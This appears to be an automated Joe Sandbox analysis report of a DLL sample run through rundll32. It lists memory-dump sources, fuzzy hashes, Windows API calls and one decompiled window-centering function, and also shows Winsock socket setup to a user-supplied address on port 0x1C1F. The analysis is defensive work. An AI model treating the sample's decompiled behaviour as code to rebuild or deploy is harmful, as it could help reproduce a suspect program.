                                                                                                                                  0x1002a8d5
                                                                                                                                  0x1002a8d7
                                                                                                                                  0x1002a8d7
                                                                                                                                  0x1002a8db
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a8e3
                                                                                                                                  0x1002a8e8
                                                                                                                                  0x1002a8eb

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 656273425-0
                                                                                                                                  • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                  • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                  • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                  • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				struct tagRECT _v28;
                                                                                                                                  				struct tagRECT _v44;
                                                                                                                                  				struct tagRECT _v60;
                                                                                                                                  				struct tagRECT _v80;
                                                                                                                                  				char _v100;
                                                                                                                                  				void* __edi;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				struct HWND__* _t59;
                                                                                                                                  				intOrPtr _t94;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				struct HWND__* _t104;
                                                                                                                                  				void* _t105;
                                                                                                                                  				struct HWND__* _t107;
                                                                                                                                  				long _t108;
                                                                                                                                  				long _t116;
                                                                                                                                  				void* _t119;
                                                                                                                                  				struct HWND__* _t121;
                                                                                                                                  				void* _t123;
                                                                                                                                  				intOrPtr _t125;
                                                                                                                                  				intOrPtr _t129;
                                                                                                                                  
                                                                                                                                  				_t119 = __edx;
                                                                                                                                  				_t105 = __ebx;
                                                                                                                                  				_t125 = __ecx;
                                                                                                                                  				_v12 = __ecx;
                                                                                                                                  				_v8 = E1001DDC0(__ecx);
                                                                                                                                  				_t58 = _a4;
                                                                                                                                  				if(_t58 == 0) {
                                                                                                                                  					if((_v8 & 0x40000000) == 0) {
                                                                                                                                  						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                                  					} else {
                                                                                                                                  						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                                  					}
                                                                                                                                  					_t121 = _t59;
                                                                                                                                  					if(_t121 != 0) {
                                                                                                                                  						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                                  						if(_t104 != 0) {
                                                                                                                                  							_t121 = _t104;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                                  					_t121 =  *_t4;
                                                                                                                                  				}
                                                                                                                                  				_push(_t105);
                                                                                                                                  				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                                  				if((_v8 & 0x40000000) != 0) {
                                                                                                                                  					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                                  					GetClientRect(_t107,  &_v28);
                                                                                                                                  					GetClientRect(_t121,  &_v44);
                                                                                                                                  					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                                  				} else {
                                                                                                                                  					if(_t121 != 0) {
                                                                                                                                  						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                                  						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                                  							_t121 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_v100 = 0x28;
                                                                                                                                  					if(_t121 != 0) {
                                                                                                                                  						GetWindowRect(_t121,  &_v44);
                                                                                                                                  						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
                                                                                                                                  						CopyRect( &_v28,  &_v80);
                                                                                                                                  					} else {
                                                                                                                                  						_t94 = E10014B42();
                                                                                                                                  						if(_t94 != 0) {
                                                                                                                                  							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                                  						}
                                                                                                                                  						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
                                                                                                                                  						CopyRect( &_v44,  &_v80);
                                                                                                                                  						CopyRect( &_v28,  &_v80);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t108 = _v60.left;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t123 = _v60.right - _t108;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t120 = _v44.bottom;
                                                                                                                                  				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                                  				_a4 = _v60.bottom - _v60.top;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                                  				if(_t116 >= _v28.left) {
                                                                                                                                  					if(_t123 + _t116 > _v28.right) {
                                                                                                                                  						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t116 = _v28.left;
                                                                                                                                  				}
                                                                                                                                  				if(_t129 >= _v28.top) {
                                                                                                                                  					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                                  						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t129 = _v28.top;
                                                                                                                                  				}
                                                                                                                                  				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                  			}


























                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                  • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                  • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                  • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 808654186-3887548279
                                                                                                                                  • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                  • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                  • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                  • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 100161DE
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                  • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                  • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3191170017-0
                                                                                                                                  • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                  • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                  • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                  • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                  • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                  • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                  • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                  • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                  • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                    • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                  • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                  • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                  • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                  • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                    • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                    • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                    • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                  • String ID: AfxOldWndProc423
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                    • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                  • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                  • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                    • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                    • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                  • _printf.LIBCMT ref: 10012F79
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                  • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                  • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                  • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                  • __lock.LIBCMT ref: 10035229
                                                                                                                                  • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                  • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                  • String ID: MS Shell Dlg
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                  • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                  • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                  • String ID: System
                                                                                                                                  • API String ID: 46613423-3470857405
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                  • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                  • _memset.LIBCMT ref: 10020AE2
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1891723912-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                    • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                    • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                  • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 317715441-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                  • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                    • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                                    • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                    • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 168474834-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F3B
